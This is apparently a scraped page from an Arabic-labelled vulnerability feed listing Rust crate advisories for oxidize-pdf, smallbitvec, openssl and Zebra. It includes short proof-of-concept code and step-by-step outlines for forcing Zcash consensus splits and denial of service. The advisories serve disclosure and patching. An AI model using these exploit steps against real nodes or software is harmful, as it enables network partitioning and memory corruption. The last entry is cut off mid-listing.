🛡️ Vuln Watch
Vulnerabilities Package Scanner
🕐 آخر تحديث:
⏭️ التحديث القادم:
⏳ المتبقي: 00:00
الإجمالي: 242213
نتائج: 1706
ص: 1/35
📡 المصادر:
غير محدد
📦 oxidize-pdf 📌 All versions < 2.6.0 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Impact `oxidize-pdf` defines `Color` as a `pub enum` with public tuple-struct variants `Rgb(f64, f64, f64)`, `Gray(f64)`, and `Cmyk(f64, f64, f64, f64)`. The constructors `Color::rgb`, `Color::gray`, and `Color::cmyk` clamp incoming components to `[0.0, 1.0]`, but becaus...
📅 2026-05-11 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

### Impact `oxidize-pdf` defines `Color` as a `pub enum` with public tuple-struct variants `Rgb(f64, f64, f64)`, `Gray(f64)`, and `Cmyk(f64, f64, f64, f64)`. The constructors `Color::rgb`, `Color::gray`, and `Color::cmyk` clamp incoming components to `[0.0, 1.0]`, but because the variants are `pub`, callers can construct values directly without going through the constructors: ```rust let safe = Color::rgb(f64::NAN, 0.5, 0.5); // clamps NaN to 0.0 let attack = Color::Rgb(f64::NAN, 0.5, 0.5); // bypasses clamp Color: Copy allows the non-finite value to propagate freely through API surfaces and serialisation. When such a value reaches a content-stream emitter, the writer formats it via format!("{:.3}", v). The Rust standard library renders f64::NAN as "NaN", f64::INFINITY as "inf", and f64::NEG_INFINITY as "-inf" — none of which are valid PDF numeric tokens per ISO 32000-1 §7.3.3: ▎ A numeric object shall be represented by one or more decimal digits with an optional sign and a leading, trailing, or embedded PERIOD. The resulting content stream contains an invalid token sequence (e.g. NaN 0.500 0.500 rg). Conformant PDF viewers (Adobe Acrobat, Foxit, PDF.js, Apple Preview) reject the content stream, the affected page, or the entire document depending on parser strictness. Affected packages (all listed in the "Affected products" section of this advisory): - oxidize-pdf on crates.io — the core Rust library where the vulnerable code path lives. - OxidizePdf.NET on NuGet — .NET FFI binding that exposes Color through its public API; inherits the vulnerability from its dependency on oxidize-pdf. - oxidize-pdf on PyPI — Python bindings (PyO3) that similarly expose colour construction; inherits the vulnerability from its dependency. Who is impacted: any application that uses these packages to generate PDFs and accepts user-influenced colour values without validation. The most exposed surfaces are server-side PDF generators that take arbitrary f64 colour parameters from upstream services. Reproduction (Rust API): use oxidize_pdf::{Document, Page, graphics::Color}; let mut doc = Document::new(); let mut page = Page::a4(); let gc = page.graphics(); gc.set_fill_color(Color::Rgb(f64::NAN, 0.5, 0.5)); gc.rectangle(50.0, 50.0, 100.0, 100.0).fill(); doc.add_page(page); doc.save("malformed.pdf").unwrap(); // The resulting content stream contains: // NaN 0.500 0.500 rg // 50 50 100 100 re // f // which conformant viewers reject. Affected sites in oxidize-pdf 2.5.7 (the same code paths are reached by both .NET and Python bindings via FFI): - oxidize-pdf-core/src/text/flow.rs (TextFlowContext) - oxidize-pdf-core/src/text/mod.rs (TextContext::apply_text_state_parameters) - oxidize-pdf-core/src/graphics/mod.rs (GraphicsContext::apply_fill_color / apply_stroke_color) - oxidize-pdf-core/src/graphics/patterns.rs (create_checkerboard_pattern / create_stripe_pattern / create_dots_pattern) - ~45 sibling sites across forms/*, annotations/*, layout/rich_text.rs, and writer/pdf_writer/mod.rs that emit colour through the same code path. Patches The fix introduces a sanitising helper at the emission boundary in graphics/color.rs: pub(crate) fn finite_or_zero(val: f64) -> f64 { if val.is_finite() { val } else { 0.0 } } Every colour-operator emitter (~50 sites across 17 files) now routes through fill_color_op / stroke_color_op / write_fill_color / write_stroke_color, which apply finite_or_zero before formatting. Non-finite components are substituted with 0.0, so the wire format remains ISO 32000-1 conformant regardless of the input. Patched releases: - oxidize-pdf 2.6.0 on crates.io — contains the fix at the source. - OxidizePdf.NET on NuGet — bumped to depend on oxidize-pdf 2.6.0 (see "Patched versions" above). - oxidize-pdf on PyPI — bumped to depend on oxidize-pdf 2.6.0 (see "Patched versions" above). Users should upgrade to the patched version of whichever package(s) they consume. Workarounds For users who cannot upgrade immediately: - Always construct colours via the safe constructors Color::rgb(), Color::gray(), Color::cmyk(), which clamp components to [0.0, 1.0] (no NaN/inf survives clamping). - Never use direct enum construction (Color::Rgb(...), Color::Gray(...), Color::Cmyk(...)) when components originate from untrusted input. The same applies to the corresponding APIs in the .NET and Python bindings. - Validate untrusted f64 colour inputs with f64::is_finite() (Rust) or equivalent checks (!double.IsFinite(v) in .NET, math.isfinite(v) in Python) before passing them to any oxidize-pdf API. These mitigations are partial — they cover the application layer but not other code paths that may construct Color values internally. The full fix is the upgrade to the patched versions. References - Issue: https://github.com/bzsanti/oxidizePdf/issues/220 - Companion refactor: https://github.com/bzsanti/oxidizePdf/issues/221 - Fix PR: https://github.com/bzsanti/oxidizePdf/pull/225 - Release PR (oxidize-pdf 2.6.0): https://github.com/bzsanti/oxidizePdf/pull/226 - .NET binding repository: https://github.com/bzsanti/oxidize-pdf-dotnet - Python binding repository: https://github.com/bzsanti/oxidize-python - ISO 32000-1 §7.3.3 (Numeric Objects): https://www.iso.org/standard/51502.html A broader follow-up tracks the same CWE class in non-colour numeric content-stream emitters (line widths, transformation matrices, dash arrays, text positioning, path operators) — to be addressed in oxidize-pdf 2.7.0 with its own advisory.

الإصدارات المتأثرة

All versions < 2.6.0

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

غير محدد
📦 steamworks 📌 All versions < 0.13.1 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 Processing the raw `ValidateAuthTicketResponse_t` callback data panics when the `m_eAuthSessionResponse` field is `k_EAuthSessionResponseAuthTicketNetworkIdentityFailure`. This can lead to denial of service in game clients and servers using the `begin_authentication_session` API ...
📅 2026-05-11 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

Processing the raw `ValidateAuthTicketResponse_t` callback data panics when the `m_eAuthSessionResponse` field is `k_EAuthSessionResponseAuthTicketNetworkIdentityFailure`. This can lead to denial of service in game clients and servers using the `begin_authentication_session` API to authenticate players if a malicious game client sends an authentication ticket with a network identity that does not match that of the verifier.

الإصدارات المتأثرة

All versions < 0.13.1

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

عالية
📦 smallbitvec 📌 1.0.1 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 محلي ⚪ لم تُستغل
💬 ### Summary An integer overflow in the internal capacity calculation of `smallbitvec` can lead to an undersized heap allocation, resulting in a heap buffer overflow through safe APIs only. This allows memory corruption without requiring `unsafe` code from the caller. ### Details...
📅 2026-05-09 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

### Summary An integer overflow in the internal capacity calculation of `smallbitvec` can lead to an undersized heap allocation, resulting in a heap buffer overflow through safe APIs only. This allows memory corruption without requiring `unsafe` code from the caller. ### Details The issue originates from unchecked arithmetic in the internal helper function responsible for computing the required buffer size: ``` (cap + bits_per_storage() - 1) / bits_per_storage() ``` When `cap` is close to `usize::MAX`, the addition: ``` cap + bits_per_storage() - 1 ``` can overflow in release builds and wrap around due to Rust’s default wrapping semantics for integer overflow in optimized builds. As a result: - `buffer_len(cap)` may return a value significantly smaller than required. - The backing storage is allocated with insufficient size. - Internal metadata (logical length/capacity) reflects a much larger size than the actual allocation. Subsequent safe API calls (e.g., `set`, `push`, `reserve`) rely on this corrupted metadata and perform index computations that assume sufficient backing storage. These operations eventually reach unsafe internal code paths (e.g., pointer arithmetic and unchecked indexing), leading to out-of-bounds memory access. Summary of the issue: integer overflow → undersized allocation → inconsistent metadata (len/cap vs actual buffer) → unsafe internal access using corrupted metadata → heap buffer overflow (UB) ### PoC #### PoC 1: Out-of-bounds write via `from_elem` ```rust #![forbid(unsafe_code)] use smallbitvec::SmallBitVec; fn main() { // Triggers overflow in buffer_len(cap) let mut v = SmallBitVec::from_elem(usize::MAX, false); // Logical length is large, but backing storage is undersized // This leads to out-of-bounds write in unsafe internals v.set(0, true); } ``` #### PoC 2: Overflow via `reserve` ```rust #![forbid(unsafe_code)] use smallbitvec::SmallBitVec; fn main() { let mut v = SmallBitVec::new(); v.push(true); // Triggers overflow in capacity computation v.reserve(usize::MAX - 10); } ``` ### Impact - Heap buffer overflow via safe API only - ASAN-observable heap-buffer-overflow - Undefined Behavior detectable with Miri (e.g., out-of-bounds indexing due to corrupted metadata) ### Tested on - rustc 1.96.0-nightly (9602bda1d 2026-04-05) - Target: x86_64-unknown-linux-gnu - Build: release - ASAN: `RUSTFLAGS="-Z sanitizer=address" cargo +nightly run --release` - Miri: `cargo +nightly miri run --release`

الإصدارات المتأثرة

1.0.1

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H

حرجة
📦 zebrad 📌 All versions < 4.4.1 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 # Consensus Divergence in V5 Transparent SIGHASH_SINGLE With No Corresponding Output ## Summary Zebra failed to enforce a ZIP-244 consensus rule for V5 transparent transactions: when an input is signed with `SIGHASH_SINGLE` and there is no transparent output at the same index a...
📅 2026-05-08 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

# Consensus Divergence in V5 Transparent SIGHASH_SINGLE With No Corresponding Output ## Summary Zebra failed to enforce a ZIP-244 consensus rule for V5 transparent transactions: when an input is signed with `SIGHASH_SINGLE` and there is no transparent output at the same index as that input, validation must fail. Zebra instead asked the underlying sighash library to compute a digest, and that library produced a digest over an empty output set rather than failing. An attacker could craft a V5 transaction with more transparent inputs than outputs that Zebra accepts but `zcashd` rejects, creating a consensus split between Zebra and `zcashd` nodes. A previous fix ([`GHSA-cwfq-rfcr-8hmp`](https://github.com/ZcashFoundation/zebra/security/advisories/GHSA-cwfq-rfcr-8hmp)) addressed a closely related case in the same area of the code, but did not cover this specific one. ## Severity **Critical** - This is a Consensus Vulnerability that could allow a malicious party to induce network partitioning, service disruption, and potential double-spend attacks against affected nodes. Note that the impact is currently alleviated by the fact that currently most miners run `zcashd`. ## Affected Versions Zebra 4.4.0. ## Description Verification of transparent transactions inherits the Bitcoin Script verification code in C++. Since it is consensus-critical, this code is called from Zebra through a foreign function interface (FFI), with a Rust callback that computes the sighash for each input being verified. ZIP-244 §S.2a marks two situations as consensus failure for V5 transparent signatures: 1. The signed hash type is not one of the six canonical values; and 2. The hash type is `SIGHASH_SINGLE` (alone or combined with `ANYONECANPAY`) and the input has no transparent output at the same index. `zcashd` enforces both rules: its `SignatureHash` raises an exception, and `CheckSig` catches it and fails the script. A previous fix (`GHSA-cwfq-rfcr-8hmp`) added the first rule to Zebra's V5 sighash callback. The second rule, however, was not added — Zebra's callback forwarded the request to `librustzcash`'s ZIP-244 implementation, which handles an out-of-range `SIGHASH_SINGLE` output index by hashing an empty output set rather than refusing to produce a digest. As a result, Zebra would compute a well-defined sighash for the missing-output case and accept any signature that verified against it. An attacker could exploit this by: - Constructing a V5 transaction with two or more transparent inputs and fewer transparent outputs; - Signing an input whose index has no matching `vout` entry with `SIGHASH_SINGLE` (`0x03`) or `SIGHASH_SINGLE|ANYONECANPAY` (`0x83`), using the digest Zebra computes; - Broadcasting the transaction, or a block containing it, to the network. Zebra would verify the transaction's transparent script and accept the transaction (and any block containing it), while `zcashd` would reject both, splitting Zebra nodes from the rest of the network. ## Impact **Consensus Failure** - **Attack Vector:** Network. - **Effect:** Network partition/consensus split. - **Scope:** Any affected Zebra node. ## Fixed Versions This issue is fixed in Zebra 4.4.1. ## Mitigation Users should upgrade to Zebra 4.4.1 or later immediately. There are no known workarounds for this issue. Immediate upgrade is the only way to ensure the node remains on the correct consensus path and is protected against malicious chain forks. ## Credits Zebra thanks @sangsoo-osec, @zmanian, and @fivelittleducks for finding and reporting the issue.

الإصدارات المتأثرة

All versions < 4.4.1

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:H/SA:H

8.7/10 عالية
📦 zebrad ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io ⚡ Resource Exhaustion 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ## Summary A composite denial-of-service vulnerability in Zebra's block discovery pipeline allows an unauthenticated remote attacker to permanently halt all new block discovery on a targeted node. The attack exploits three independent weaknesses in the gossip, syncer, and downlo...
📅 2026-05-08 NVD 🔗 التفاصيل

الوصف الكامل

## Summary A composite denial-of-service vulnerability in Zebra's block discovery pipeline allows an unauthenticated remote attacker to permanently halt all new block discovery on a targeted node. The attack exploits three independent weaknesses in the gossip, syncer, and download subsystems — all exercisable from a single TCP connection — to create a monotonically growing block deficit that never self-heals. ## Severity **Critical** — This is a Denial of Service vulnerability that requires no authentication, no special privileges, and only a single peer connection. The halt is permanent: the node will never recover without operator intervention. ## Affected Versions All Zebra versions prior to 4.4.0. ## Description Zebra discovers new blocks through two complementary paths: a gossip path (peers announce blocks via `inv` messages, triggering individual block downloads) and a syncer path (Zebra periodically queries peers with `FindBlocks`/`FindHeaders` to discover chains of missing blocks). Both paths must function for normal operation. The gossip path was vulnerable because there was no per-connection rate limit on `inv` messages. A single connection could send enough sequential `inv` messages with fake block hashes to fill the entire gossip download queue in under a millisecond. The `FullQueue` return value was silently ignored, so legitimate block announcements from honest peers were dropped with no warning. The syncer backup path could be degraded by responding with empty `inv` to `FindBlocks` requests and with `NotFound` to block download requests. Both are valid protocol responses that carried zero misbehavior penalty. The attacker's connection was never banned and never disconnected, allowing the degradation to persist indefinitely. Combining these two vectors, an attacker could suppress both block discovery paths simultaneously from a single connection, causing the node to fall permanently behind the chain tip. ## Impact **Denial of Service** * **Attack Vector:** Network, unauthenticated. Requires only a single TCP peer connection. * **Effect:** Permanent halt of block discovery. The targeted node falls behind the chain tip and never recovers without operator intervention. * **Scope:** Any Zebra node reachable by the attacker over the peer-to-peer network. ## Fixed Versions This issue is fixed in Zebra 4.4.0. The fix drops connections that send empty responses to `FindBlocks` and `FindHeaders` messages, preventing attackers from degrading the syncer path without consequence. ## Mitigation Users should upgrade to Zebra 4.4.0 or later immediately. There are no known workarounds for this issue. Immediate upgrade is the only way to protect against this attack. ## Credits Zebra the researcher who reported this issue through the coordinated disclosure process.

نوع الثغرة

CWE-770 — Resource Exhaustion

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

غير محدد
📦 openssl 📌 All versions < 0.10.79 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 محلي ⚪ لم تُستغل 🟢 ترقيع
💬 `CipherCtxRef::cipher_update`, `CipherCtxRef::cipher_update_vec`, and `symm::Crypter::update` incorrectly sized output buffers when used with AES key-wrap-with-padding ciphers (`EVP_aes_{128,192,256}_wrap_pad`). For a non-multiple-of-8 input, OpenSSL writes up to 7 bytes past the...
📅 2026-05-07 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

`CipherCtxRef::cipher_update`, `CipherCtxRef::cipher_update_vec`, and `symm::Crypter::update` incorrectly sized output buffers when used with AES key-wrap-with-padding ciphers (`EVP_aes_{128,192,256}_wrap_pad`). For a non-multiple-of-8 input, OpenSSL writes up to 7 bytes past the end of the caller's buffer or Vec, producing attacker-controllable heap corruption when the plaintext length is attacker-influenced. This only impacts users using AES key-wrap-with-padding ciphers.

الإصدارات المتأثرة

All versions < 0.10.79

CVSS Vector

CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N

حرجة
📦 zebrad 📌 All versions < 4.4.0 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 # `Zebra` Transparent `SIGHASH_SINGLE` Corresponding-Output Handling Diverges From `zcashd` ### Summary For V5+ transparent spends, `Zebra` and `zcashd` disagree on the same consensus rule: `SIGHASH_SINGLE` must fail when the input index has no corresponding output. `zcashd` tre...
📅 2026-05-07 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

# `Zebra` Transparent `SIGHASH_SINGLE` Corresponding-Output Handling Diverges From `zcashd` ### Summary For V5+ transparent spends, `Zebra` and `zcashd` disagree on the same consensus rule: `SIGHASH_SINGLE` must fail when the input index has no corresponding output. `zcashd` treats this as consensus-invalid under ZIP-244, while `Zebra`'s transparent verification path computes a digest for the missing-output case instead of failing. The result is a direct block-validity split. A malformed V5 transparent transaction can be accepted by `Zebra`, retained in `Zebra`'s mempool, selected into `Zebra` `getblocktemplate`, mined into a block, and then rejected by `zcashd`. ### Details Validated code revisions used during analysis: - `zcashd`: `2c63e9aa08cb170b0feb374161bea94720c3e1f5` - `Zebra`: `a905fa19e3a91c7b4ead331e2709e6dec5db12cb` Scope note: - earlier triage material grouped pre-V5 and V5 behavior together; - re-execution on the pinned revisions did not reproduce the claimed pre-V5 / V4 reject-side behavior; - this advisory therefore covers the V5+ / ZIP-244 variant only. `zcashd` side: - Transparent scripts in blocks are checked through `TransactionSignatureChecker::CheckSig()` and `SignatureHash()`: [`zcash/src/script/interpreter.cpp`](https://github.com/zcash/zcash/blob/2c63e9aa08cb170b0feb374161bea94720c3e1f5/src/script/interpreter.cpp#L1386-L1407). - In the ZIP-244 branch, `SignatureHash()` explicitly throws when `SIGHASH_SINGLE` or `SIGHASH_SINGLE|ANYONECANPAY` is used with `nIn >= txTo.vout.size()`: [`zcash/src/script/interpreter.cpp`](https://github.com/zcash/zcash/blob/2c63e9aa08cb170b0feb374161bea94720c3e1f5/src/script/interpreter.cpp#L1221-L1259). - `CheckSig()` catches that exception and returns `false`, causing the transparent script to fail. `Zebra` side: - V5 transparent inputs route into the same FFI-based transparent script verifier used for block validation: [`zebra/zebra-consensus/src/transaction.rs`](https://github.com/ZcashFoundation/zebra/blob/a905fa19e3a91c7b4ead331e2709e6dec5db12cb/zebra-consensus/src/transaction.rs#L989-L1098). - `Zebra` converts the decoded hash type and asks its Rust sighash engine for a digest without adding the corresponding-output pre-check that `zcashd` enforces first: [`zebra/zebra-script/src/lib.rs`](https://github.com/ZcashFoundation/zebra/blob/a905fa19e3a91c7b4ead331e2709e6dec5db12cb/zebra-script/src/lib.rs#L160-L175), [`zebra/zebra-chain/src/primitives/zcash_primitives.rs`](https://github.com/ZcashFoundation/zebra/blob/a905fa19e3a91c7b4ead331e2709e6dec5db12cb/zebra-chain/src/primitives/zcash_primitives.rs#L307-L343). - `Zebra` forwards canonical `SIGHASH_SINGLE` into the Rust ZIP-244 implementation. - In that implementation, when `input.index() >= bundle.vout.len()`, the code uses `transparent_outputs_hash::<TxOut>(&[])` instead of erroring: [`zcash_primitives/src/transaction/sighash_v5.rs`](https://github.com/zcash/librustzcash/blob/c3425f9c3c7f6deb20720bb78b18f35fbbed8edd/zcash_primitives/src/transaction/sighash_v5.rs#L101-L107), [`zcash_primitives/src/transaction/sighash_v5.rs`](https://github.com/zcash/librustzcash/blob/c3425f9c3c7f6deb20720bb78b18f35fbbed8edd/zcash_primitives/src/transaction/sighash_v5.rs#L131-L139). Why this is exploitable: - the malformed transaction only needs fewer transparent outputs than inputs; - the attacker signs the digest that `Zebra` computes for the missing-output case; - `Zebra` then sees a valid transparent signature, while `zcashd` never reaches the same digest because it fails first. Ordinary path viability: - `zcashd` ordinary mempool admission is not the practical trigger path, because the same ZIP-244 `SignatureHash()` checks fail there first: [`zcash/src/main.cpp`](https://github.com/zcash/zcash/blob/2c63e9aa08cb170b0feb374161bea94720c3e1f5/src/main.cpp#L1981-L1995), [`zcash/src/script/interpreter.cpp`](https://github.com/zcash/zcash/blob/2c63e9aa08cb170b0feb374161bea94720c3e1f5/src/script/interpreter.cpp#L1221-L1259). - `Zebra` ordinary mempool admission is viable because `Zebra` uses the same transparent verifier for mempool and block validation and does not have a separate "one output per input" standardness rule here: [`zebra/zebra-consensus/src/transaction.rs`](https://github.com/ZcashFoundation/zebra/blob/a905fa19e3a91c7b4ead331e2709e6dec5db12cb/zebra-consensus/src/transaction.rs#L414-L519), [`zebra/zebrad/src/components/mempool/storage.rs`](https://github.com/ZcashFoundation/zebra/blob/a905fa19e3a91c7b4ead331e2709e6dec5db12cb/zebrad/src/components/mempool/storage.rs#L255-L376). - `Zebra` is a block-template producer, so the realistic stock path is `Zebra` mempool -> `Zebra` `getblocktemplate` -> external miner: [`zebra/zebra-rpc/src/methods/types/get_block_template/zip317.rs`](https://github.com/ZcashFoundation/zebra/blob/a905fa19e3a91c7b4ead331e2709e6dec5db12cb/zebra-rpc/src/methods/types/get_block_template/zip317.rs#L72-L105). ### PoC Validated commits: - `zcashd`: `2c63e9aa08cb170b0feb374161bea94720c3e1f5` - `Zebra`: `a905fa19e3a91c7b4ead331e2709e6dec5db12cb` Manual reproduction steps: 1. Build an otherwise-valid V5 transaction with at least two transparent inputs and only one transparent output. 2. Sign input `0` normally. 3. Sign input `1` with canonical `SIGHASH_SINGLE` or `SIGHASH_SINGLE|ANYONECANPAY`. 4. Use the digest returned by `Zebra`'s ZIP-244 path, where the missing output contributes `transparent_outputs_hash([])`. 5. Submit the transaction to `Zebra` and to `zcashd`. 6. Observe: - `Zebra` accepts it into the mempool; - `Zebra` selects it into `getblocktemplate`; - `Zebra` can mine and accept a block containing it; - `zcashd` rejects it in the ordinary mempool path. ### Impact This is a direct V5+ transparent consensus split. Who can trigger it: - an ordinary transaction author can craft the malformed V5 transparent transaction; - the accept-side stock path is `Zebra`'s mempool and block-template path; - an external miner still has to include the transaction in a block for the split to materialize. Who is impacted: - `Zebra` can accept and template a transaction / block that `zcashd` rejects; - this makes the issue both a consensus-divergence problem and a practical `Zebra` block-template safety problem.

الإصدارات المتأثرة

All versions < 4.4.0

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N

حرجة
📦 zebra-script 🏢 zfnd 📌 All versions < 6.0.0 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io ⚡ CWE-347 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 # CVE-2026-44497: Consensus Divergence in Transparent Sighash Hash-Type Handling due to Stale Buffer ## Summary The fix for https://github.com/ZcashFoundation/zebra/security/advisories/GHSA-8m29-fpq5-89jj introduced a separate issue due to insuficient error handling of the case...
📅 2026-05-07 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

# CVE-2026-44497: Consensus Divergence in Transparent Sighash Hash-Type Handling due to Stale Buffer ## Summary The fix for https://github.com/ZcashFoundation/zebra/security/advisories/GHSA-8m29-fpq5-89jj introduced a separate issue due to insuficient error handling of the case where the sighash type is invalid, during sighash computation. Instead of returning an error, the normal flow would resume, and the input sighash buffer would be left untouched. In scenarios where a previous signature validation could leave a valid sighash in the buffer, an invalid hash-type could be incorrectly accepted, which would create a consensus split between Zebra and zcashd nodes. ## Severity **Critical** - This is a Consensus Vulnerability that could allow a malicious party to induce network partitioning, service disruption, and potential double-spend attacks against affected nodes. Note that the impact is currently alleviated by the fact that currently most miners run `zcashd`. ## Affected Versions Zebra 4.3.1. ## Description Verification of transparent transactions inherits the Bitcoin Script verification code in C++, called from Zebra through a foreign function interface (FFI) with a Rust callback that computes the sighash. The fix for https://github.com/ZcashFoundation/zebra/security/advisories/GHSA-8m29-fpq5-89jj added the missing V5 hash-type consensus check on the Rust side, returning `None` for undefined hash types. However, the FFI bridge only writes to the C++ sighash buffer when the callback returns `Some`, and the C++ checker reads that buffer unconditionally, so the failure signal is lost. An attacker could exploit this by: - Constructing a transparent output spent by a script that runs a valid `OP_CHECKSIGVERIFY` immediately before an `OP_CHECKSIG` with an undefined hash type. - The first opcode primes the C++ sighash buffer with a valid digest; the second causes Zebra's callback to return `None` while the C++ checker verifies the invalid signature against the stale digest. - Zebra accepts the spend, zcashd rejects it, creating a consensus split in the network. ## Impact **Consensus Failure** - **Attack Vector:** Network. - **Effect:** Network partition/consensus split. - **Scope:** Any affected Zebra node, and any miner or template pipeline that relies on Zebra's validation result. ## Fixed Versions This issue is fixed in 4.4.0. The fixes uses a workaround where the input buffer is filled with random bytes on validation failure, which makes signature validation fail (as expected) with overwhelming probability. This avoids a breaking release of the `zcash_script` crate. A future release will propagate the error correctly for a direct fix. ## Mitigation Users should upgrade to 4.4.0 or later immediately. There are no known workarounds for this issue. Immediate upgrade is the only way to ensure the node remains on the correct consensus path and is protected against malicious chain forks. ## Credits Zebra thanks @sangsoo-osec for finding and reporting the issue.

الإصدارات المتأثرة

All versions < 6.0.0

نوع الثغرة

CWE-347 — CWE-347

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:H/SA:H

غير محدد
📦 zebra-network 🏢 zfnd 📌 All versions < 6.0.0 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io ⚡ Resource Exhaustion 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 # CVE-2026-44500: Allocation Amplification in Inbound Network Deserializers ## Summary Several inbound deserialization paths in Zebra allocated buffers sized against generic transport or block-size ceilings before the tighter protocol or consensus limits were enforced. An unaut...
📅 2026-05-07 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

# CVE-2026-44500: Allocation Amplification in Inbound Network Deserializers ## Summary Several inbound deserialization paths in Zebra allocated buffers sized against generic transport or block-size ceilings before the tighter protocol or consensus limits were enforced. An unauthenticated or post-handshake peer could therefore force the node to preallocate and parse for orders of magnitude more data than the protocol intended, across `headers` messages, equihash solutions in block headers, Sapling spend vectors in V5/V4 transactions, and coinbase script bytes in blocks. ## Severity **Moderate** - This is a Denial-of-Service Vulnerability that could allow a malicious peer to amplify per-message memory and parse cost on Zebra nodes, with effects amplified by multi-peer fan-in. Each individual case is bounded by the 2 MiB transport ceiling or the block-size cap, so no single message causes unbounded allocation, but the cumulative gap between intended and actual limits is significant. ## Affected Versions All Zebra versions prior to 4.4.0. ## Description Zebra's network codec uses `TrustedPreallocate` and generic `Vec` deserialization to bound inbound message parsing. In several places the bound used at the deserializer was the generic transport or block-size ceiling rather than the tighter protocol or consensus rule that applies to the field, so allocation happened first and the real limit was only enforced afterwards. Four such cases were identified: - **`headers` message receive cap.** `read_headers()` deserialized the `CountedHeader` vector via the generic `TrustedPreallocate` path, which allowed up to ~1,409 entries per message. The protocol ceiling `MAX_FIND_BLOCK_HEADERS_RESULTS = 160` was only used on the send side, giving an ~8.8x preallocation gap on receive. Reachable before the version handshake completes since the codec is installed on raw bytes. - **Equihash solution length.** `Solution::zcash_deserialize` decoded the solution as a generic `Vec<u8>` and only checked the exact consensus size (1344 bytes mainnet/testnet, 36 bytes regtest) afterwards in `Solution::from_bytes`. A single fixed-size header field could be inflated to nearly the full block-size ceiling before rejection. - **Sapling spend vectors in coinbase transactions.** V5 `spend_prefixes` and V4 `shielded_spends` were allocated generically with block-size-derived ceilings (~5,681 / ~5,208 entries) before the consensus rule that coinbase transactions have zero Sapling spends was enforced in the verifier. - **Coinbase script bytes.** `Input::zcash_deserialize()` read the coinbase script as a generic `Vec<u8>` up to the message-size cap before enforcing the consensus rule that coinbase scripts are between 2 and 100 bytes. An attacker could exploit this by: - Opening an inbound TCP connection (and, for the latter three cases, completing the version handshake). - Sending one of: a `headers` message with a CompactSize count up to ~1,409, a `block` whose header carries an inflated equihash CompactSize, a `tx` declaring a coinbase input with a large `nSpendsSapling`, or a `block` with a coinbase input whose script length is near the message-size ceiling. - The deserializer allocates against the loose ceiling, parses, and only then rejects. ## Impact **Denial of Service** - **Attack Vector:** Network. - **Effect:** Amplified per-message allocation and parse cost on inbound peer messages, stackable across concurrent connections. The concrete effect will be influenced by how much memory Zebra has available. - **Scope:** Any affected Zebra node. ## Fixed Versions This issue is fixed in Zebra 4.4.0. ## Mitigation Users should upgrade to Zebra 4.4.0 or later immediately. There are no known workarounds for this issue. Immediate upgrade is the only way to remove the amplified allocation surface on inbound peer messages. ## Credits Zebra thanks @Zk-nd3r for finding and reporting the issues.

الإصدارات المتأثرة

All versions < 6.0.0

نوع الثغرة

CWE-770 — Resource Exhaustion

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

حرجة
📦 zebrad 🏢 zfnd 📌 All versions < 4.4.0 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io ⚡ CWE-682 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 Zebra's block validator undercounts transparent signature operations against the 20000-sigop block limit (`MAX_BLOCK_SIGOPS`), allowing it to accept blocks that `zcashd` rejects with `bad-blk-sigops`. A miner who produces such a block can split the network: Zebra nodes follow the...
📅 2026-05-07 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

